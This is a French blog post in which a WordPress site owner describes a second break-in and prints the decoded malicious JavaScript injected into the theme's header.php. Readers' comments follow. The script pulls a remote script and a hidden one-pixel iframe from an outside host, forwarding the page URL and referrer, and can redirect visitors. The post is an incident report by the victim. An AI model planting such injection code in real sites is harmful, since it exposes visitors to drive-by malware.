Une 2e attaque sur Voie Militante en 6 mois !
Samedi matin, aux alentours de 11 h 00, je reçois un coup de téléphone à mon domicile de l’un de mes fidèles lecteurs. Il me dit qu’Avast lui a signalé un Trojan sur la page principale du blog Voie Militante.
Hélas, étant sous Linux, je n’ai aucun moyen de vérifier que le contenu d’une page visitée est infecté. Et pourtant, le bougre, il disait juste. Confirmation par mail vers 14 h 00 d’un autre lecteur.
Je cherche dans la page et je tombe là-dessus. Le code présenté ci-dessous a dû faire l’objet d’un décodage de ma part ayant nécessité près d’une heure d’acharnement.
<script>
document.write( "<script src=\ " "+ "http://itsallbreaksoft.net/tds/in.cgi?2&seoref= "+encodeURIComponent(document.referrer)+ "¶meter=$keyword&se=$se&ur=1&HTTP_REFERER= "+ encodeURIComponent(document.URL)+ "&default_keyword=notdefine "+ "\ "><\/script> ");
</script>
<script>
if(typeof(h)== "undefined ")
{
document.write( "<iframe src='http://itsallbreaksoft.net/tds/in.cgi?3&seoref= "+encodeURIComponent(document.referrer)+ "¶meter=$keyword&se=$se&ur=1&HTTP_REFERER= "+ encodeURIComponent(document.URL)+ "&default_keyword=notdefine' width=1 height=1 border=0 frameborder=0></iframe> ");
}
else if(h.indexOf( "http: ")==0)
{
window.location=h;
}
</script>
L’injection s’est faite par une connexion à l’interface d’admin en 1 seule tentative, signe que l’assaillant était en possession d’un des mots de passe de Voie Militante. Il a déposé le code malicieux dans la page header.php du template que nous utilisons. Or, nous sommes deux à posséder un compte d’administration.
L’adresse ip de la machine concernée est 203.211.135.160 dont le nom est x7.yishun.sg ! Aucun élément sur son propriétaire.
J’ai évidemment communiqué tous les éléments en ma possession à un service de police spécialisé. Deux attaques en moins de six mois.
Si vous avez apprécié cet article, s'il vous plait, prenez le temps de laisser un commentaire ou de souscrire au flux afin de recevoir les futurs articles directement dans votre lecteur de flux.
Commentaires
bonsoir, je suis tomber sur votre blogue par hasard,
je me suis occuper de nombreux site pendant des années, et je peux vous affirmer que les attaques sont « très courantes », je dirais même que vous êtes « chanceux » de n’en subir que ci peux,étant donner la « taille de votre site », ainsi que de « son architecture ».
vous affirmer que « l’assaillant » possédait le mot de passe,
lui permettant d’injecter du code,en une tentative.
le principe de l’injection est justement de n’utiliser aucun mot de passe, voir aucun pseudo.
vous pouvez trouvez beaucoup d’information clair afin de sécuriser ce genre de faille.
pour informations, la perte de données est répréhensible par la loi(quelque chose comme 300 000 euros d’amende et 3ans de prison).
je veux dire par la, qu’il est de votre devoir, d’assurer la sécurité de ses données. (ne vous contentez pas de signaler cela a la police, mais prenez également des mesures réels.)
[...] Mal/ObfJS-H. Thus far, the common link between the affected sites appears to be WordPress. One user report suggests that the malicious script is being added to the header.php template script used by [...]